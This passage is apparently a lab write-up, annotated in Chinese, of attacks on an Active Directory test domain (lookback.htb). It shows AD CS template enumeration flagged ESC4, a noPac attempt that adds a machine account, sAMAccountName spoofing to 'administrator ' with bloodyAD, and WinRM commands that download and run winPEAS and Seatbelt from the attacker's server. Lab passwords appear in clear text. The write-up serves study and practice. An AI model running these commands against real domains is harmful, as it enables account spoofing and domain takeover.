    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  30
    Template Name                       : SmartcardLogon
    Display Name                        : Smartcard Logon
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Extended Key Usage                  : Client Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  31
    Template Name                       : ClientAuth
    Display Name                        : Authenticated Session
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  32
    Template Name                       : SmartcardUser
    Display Name                        : Smartcard User
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Extended Key Usage                  : Secure Email
                                          Client Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  33
    Template Name                       : UserSignature
    Display Name                        : User Signature Only
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  34
    Template Name                       : User
    Display Name                        : User
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Users
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
    [*] Remarks
      ESC2 Target Template              : Template can be targeted as part of ESC2 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.
      ESC3 Target Template              : Template can be targeted as part of ESC3 exploitation. This is not a vulnerability by itself. See the wiki for more details. Template has schema version 1.

Bad Ending-NoPac&证书欺诈

NoPac（CVE-2021-42278/42287）

该环境具备域控和 MAQ，理论上可能触发 noPac

Test

ms-DS-MachineAccountQuota 为 10，说明域环境允许普通用户创建机器账户

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q bloodyAD -u 'IT-login-user' -p 'ITLogin!2026#Qw' -d lookback.htb --host 172.16.55.128 get object 'DC=lookback,DC=htb' --attr ms-DS-MachineAccountQuota

distinguishedName: DC=lookback,DC=htb
ms-DS-MachineAccountQuota: 10

Command

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q nxc smb 172.16.55.128 -d lookback.htb -u IT-login-user -p 'ITLogin!2026#Qw' -M nopac
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         172.16.55.128   445    DC01             [+] lookback.htb\IT-login-user:ITLogin!2026#Qw 
NOPAC       172.16.55.128   445    DC01             TGT with PAC size 1641
NOPAC       172.16.55.128   445    DC01             TGT without PAC size 1641

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q python3 /home/kali/Desktop/tools/noPac/scanner.py lookback.htb/IT-login-user:'ITLogin!2026#Qw' -dc-ip 172.16.55.128


███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
                                           
                                        
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 172.16.55.128. Ticket size 1641
[*] Got TGT from 172.16.55.128. Ticket size 1641

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q python3 /home/kali/Desktop/tools/noPac/noPac.py lookback.htb/IT-login-user:'ITLogin!2026#Qw' -dc-ip 172.16.55.128 -use-ldap -dump

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc01.lookback.htb
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-I7X138TGYVJ$"
[*] MachineAccount "WIN-I7X138TGYVJ$" password = (xjuA$rVynCp
[*] Successfully added machine account WIN-I7X138TGYVJ$ with password (xjuA$rVynCp.
[*] WIN-I7X138TGYVJ$ object = CN=WIN-I7X138TGYVJ,CN=Computers,DC=lookback,DC=htb
[-] Cannot rename the machine account , Reason 00000523: SysErr: DSID-031A1256, problem 22 (Invalid argument), data 0

[*] Attempting to del a computer with the name: WIN-I7X138TGYVJ$
[-] Delete computer WIN-I7X138TGYVJ$ Failed! Maybe the current user does not have permission.

Ending

能拿 TGT、能创建机器账号
重命名机器账号时报 problem 22 (Invalid argument)

证书欺诈

`IT-login-user` 更名 `administrator`（无空格-失败）

proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u 'IT-admin' -p 'V9#bT6itAdmin2026!' set object IT-login-user sAMAccountName -v 'administrator'

`IT-login-user` 更名 `administrator` （有空格-成功）

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u 'IT-admin' -p 'V9bT6itAdmin2026' set object 'administrator ' userPrincipalName -v 'administrator@lookback.htb'
[+] IT-login-user's sAMAccountName has been updated

为 `administrator` 设置 UPN 为 `administrator@lookback.htb`

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u 'IT-admin' -p 'V9bT6itAdmin2026' set object 'administrator ' userPrincipalName -v 'administrator@lookback.htb'
[+] administrator 's userPrincipalName has been updated

核对修改后的属性（sAMAccountName、UPN、SID）

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u 'IT-admin' -p 'V9bT6itAdmin2026' get object 'administrator ' --attr sAMAccountName --attr userPrincipalName --attr objectSid

distinguishedName: CN=IT-login-user,CN=Users,DC=lookback,DC=htb
objectSid: S-1-5-21-3830242231-3868280746-2763890440-1112

Ending

**用户名显示为 ****lookback\administrator**（无尾部空格，系统已自动 trim）。

**SID 为 ****S-1-5-21-3830242231-3868280746-2763890440-1112**，这是 IT-login-user 的原始 SID（RID 1112），不是内置管理员 RID 500。

组成员仅有 **LOOKBACK\IT** 等普通组，无 Domain Admins。

**特权仅包含 **SeMachineAccountPrivilege**（允许将计算机加入域）和 ****SeChangeNotifyPrivilege**，无高权限。

结论：改名成功实现了用户名冒充，但权限未提升。这是一个典型的“名称欺骗”而非“权限劫持”。该账户目前可用于基于名称的证书注册攻击（如 AD CS ESC1），但无法直接 DCSync

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q nxc winrm 172.16.55.128 -d lookback.htb -u 'administrator ' -p 'ITLogin!2026#Qw' -X "whoami /all"
WINRM       172.16.55.128   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       172.16.55.128   5985   DC01             [+] lookback.htb\administrator :ITLogin!2026#Qw (Pwn3d!)                                                                                                    
WINRM       172.16.55.128   5985   DC01             [+] Executed command (shell type: powershell)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             USER INFORMATION
WINRM       172.16.55.128   5985   DC01             ----------------
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             User Name               SID
WINRM       172.16.55.128   5985   DC01             ======================= ==============================================                                                                                      
WINRM       172.16.55.128   5985   DC01             lookback\administrator  S-1-5-21-3830242231-3868280746-2763890440-1112                                                                                      
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             GROUP INFORMATION
WINRM       172.16.55.128   5985   DC01             -----------------
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             Group Name                                  Type             SID                                            Attributes                                      
WINRM       172.16.55.128   5985   DC01             =========================================== ================ ============================================== ==================================================                                                                                                      
WINRM       172.16.55.128   5985   DC01             Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             LOOKBACK\IT                                 Group            S-1-5-21-3830242231-3868280746-2763890440-1109 Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group                                                                                                      
WINRM       172.16.55.128   5985   DC01             Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                                                    
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             PRIVILEGES INFORMATION
WINRM       172.16.55.128   5985   DC01             ----------------------
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             Privilege Name                Description                    State                                                                                          
WINRM       172.16.55.128   5985   DC01             ============================= ============================== =======                                                                                        
WINRM       172.16.55.128   5985   DC01             SeMachineAccountPrivilege     Add workstations to domain     Enabled                                                                                        
WINRM       172.16.55.128   5985   DC01             SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                                                        
WINRM       172.16.55.128   5985   DC01             SeIncreaseWorkingSetPrivilege Increase a process working set Enabled                                                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             USER CLAIMS INFORMATION
WINRM       172.16.55.128   5985   DC01             -----------------------
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             User claims unknown.
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             Kerberos support for Dynamic Access Control on this device has been disabled.

Final Ending-ESC9弱证书映射

winpeas&Seatbelt

upload

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q nxc winrm '172.16.55.128' -d 'lookback.htb' -u 'administrator ' -p 'ITLogin!2026#Qw' -X '$ProgressPreference="SilentlyContinue"; Invoke-WebRequest -UseBasicParsing -Uri "http://172.16.55.193:8000/winPEASx64.exe" -OutFile "C:\ProgramData\winPEASx64.exe"; Invoke-WebRequest -UseBasicParsing -Uri "http://172.16.55.193:8000/Seatbelt.exe" -OutFile "C:\ProgramData\Seatbelt.exe"; Get-Item "C:\ProgramData\Seatbelt.exe","C:\ProgramData\winPEASx64.exe" | Select-Object FullName,Length'
WINRM       172.16.55.128   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       172.16.55.128   5985   DC01             [+] lookback.htb\administrator :ITLogin!2026#Qw (Pwn3d!)                                                                                                    
WINRM       172.16.55.128   5985   DC01             [+] Executed command (shell type: powershell)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             FullName                        Length
WINRM       172.16.55.128   5985   DC01             --------                        ------
WINRM       172.16.55.128   5985   DC01             C:\ProgramData\Seatbelt.exe     556032
WINRM       172.16.55.128   5985   DC01             C:\ProgramData\winPEASx64.exe 10170880
WINRM       172.16.55.128   5985   DC01

┌──(web)─(root㉿kali)-[/home/…/hmv/lookback/myself/tools]
└─# updog -p 8000
[+] Serving /home/kali/Desktop/hmv/lookback/myself/tools on 0.0.0.0:8000...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:8000
 * Running on http://61.139.2.134:8000
Press CTRL+C to quit
172.16.55.128 - - [11/Apr/2026 07:07:50] "GET /winPEASx64.exe HTTP/1.1" 200 -
172.16.55.128 - - [11/Apr/2026 07:07:50] "GET /Seatbelt.exe HTTP/1.1" 200 -

run

┌──(kali㉿kali)-[~]
└─$ proxychains -q nxc winrm '172.16.55.128' -d 'lookback.htb' -u 'administrator ' -p 'ITLogin!2026#Qw' -X 'Start-Process -FilePath "C:\ProgramData\winPEASx64.exe" -ArgumentList "quiet" -RedirectStandardOutput "C:\ProgramData\winpeas_out.txt" -RedirectStandardError "C:\ProgramData\winpeas_err.txt" -WindowStyle Hidden -Wait; Get-Item "C:\ProgramData\winpeas_out.txt","C:\ProgramData\winpeas_err.txt" | Select-Object FullName,Length'
WINRM       172.16.55.128   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       172.16.55.128   5985   DC01             [+] lookback.htb\administrator :ITLogin!2026#Qw (Pwn3d!)
WINRM       172.16.55.128   5985   DC01             [+] Executed command (shell type: powershell)
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             FullName                       Length
WINRM       172.16.55.128   5985   DC01             --------                       ------
WINRM       172.16.55.128   5985   DC01             C:\ProgramData\winpeas_out.txt 129138
WINRM       172.16.55.128   5985   DC01             C:\ProgramData\winpeas_err.txt      0

content

┌──(kali㉿kali)-[~]
└─$ proxychains -q nxc winrm '172.16.55.128' -d 'lookback.htb' -u 'administrator ' -p 'ITLogin!2026#Qw' -X 'Get-Content "C:\ProgramData\winpeas_out.txt"'
WINRM       172.16.55.128   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       172.16.55.128   5985   DC01             [+] lookback.htb\administrator :ITLogin!2026#Qw (Pwn3d!)                                                                                                    
WINRM       172.16.55.128   5985   DC01             [+] Executed command (shell type: powershell)
WINRM       172.16.55.128   5985   DC01              [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help                             
WINRM       172.16.55.128   5985   DC01             ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD                                                   
WINRM       172.16.55.128   5985   DC01             Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD                                                             
WINRM       172.16.55.128   5985   DC01               WinPEAS-ng by @hacktricks_live
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                    /---------------------------------------------------------------------------------\                                                                  
WINRM       172.16.55.128   5985   DC01                    |                             Do you like PEASS?                                  |                                                                  
WINRM       172.16.55.128   5985   DC01                    |---------------------------------------------------------------------------------|                                                                  
WINRM       172.16.55.128   5985   DC01                    |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |                                                                  
WINRM       172.16.55.128   5985   DC01                    |         Follow on Twitter         :     @hacktricks_live                        |                                                                  
WINRM       172.16.55.128   5985   DC01                    |         Respect on HTB            :     SirBroccoli                             |                                                                  
WINRM       172.16.55.128   5985   DC01                    |---------------------------------------------------------------------------------|                                                                  
WINRM       172.16.55.128   5985   DC01                    |                                 Thank you!                                      |                                                                  
WINRM       172.16.55.128   5985   DC01                    \---------------------------------------------------------------------------------/                                                                  
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01               [+] Legend:
WINRM       172.16.55.128   5985   DC01                      Red                Indicates a special privilege over an object or something is misconfigured                                                      
WINRM       172.16.55.128   5985   DC01                      Green              Indicates that some protection is enabled or something is well configured                                                       
WINRM       172.16.55.128   5985   DC01                      Cyan               Indicates active users
WINRM       172.16.55.128   5985   DC01                      Blue               Indicates disabled users
WINRM       172.16.55.128   5985   DC01                      LightYellow        Indicates links
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01              You can find a Windows local PE Checklist here: https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html              
WINRM       172.16.55.128   5985   DC01                Creating Dynamic lists, this could take a while, please wait...                                                                                          
WINRM       172.16.55.128   5985   DC01                - Loading sensitive_files yaml definitions file...                                                                                                       
WINRM       172.16.55.128   5985   DC01                - Loading regexes yaml definitions file...
WINRM       172.16.55.128   5985   DC01                - Checking if domain...
WINRM       172.16.55.128   5985   DC01                - Getting Win32_UserAccount info...
WINRM       172.16.55.128   5985   DC01             Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied                                                            
WINRM       172.16.55.128   5985   DC01                at System.Management.ThreadDispatch.Start()
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementScope.Initialize()
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementObjectSearcher.Initialize()                                                                                               
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementObjectSearcher.Get()                                                                                                      
WINRM       172.16.55.128   5985   DC01                at winPEAS.Checks.Checks.CreateDynamicLists(Boolean isFileSearchEnabled)                                                                                 
WINRM       172.16.55.128   5985   DC01                - Creating current user groups list...
WINRM       172.16.55.128   5985   DC01                - Creating active users list (local only)...
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.                                                                                      
WINRM       172.16.55.128   5985   DC01                - Creating disabled users list...
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.                                                                                      
WINRM       172.16.55.128   5985   DC01                - Admin users list...
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.                                                                                      
WINRM       172.16.55.128   5985   DC01                - Creating AppLocker bypass list...
WINRM       172.16.55.128   5985   DC01                - Creating files/directories list for search...
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ System Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                              
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Basic System Information
WINRM       172.16.55.128   5985   DC01             È Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#version-exploits                                                                                
WINRM       172.16.55.128   5985   DC01               [X] Exception: Access is denied
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing All Microsoft Updates
WINRM       172.16.55.128   5985   DC01               [X] Exception: Creating an instance of the COM component with CLSID {B699E5E8-67FF-4177-88B0-3684A3388BFB} from the IClassFactory failed due to the following error: 80070005 Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).            
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ System Last Shutdown Date/time (from Registry)                                                                                                 
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 Last Shutdown Date/time        :    4/10/2026 8:46:46 PM                                                                                                
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ User Environment Variables
WINRM       172.16.55.128   5985   DC01             È Check for some passwords or keys in the env variables                                                                                                     
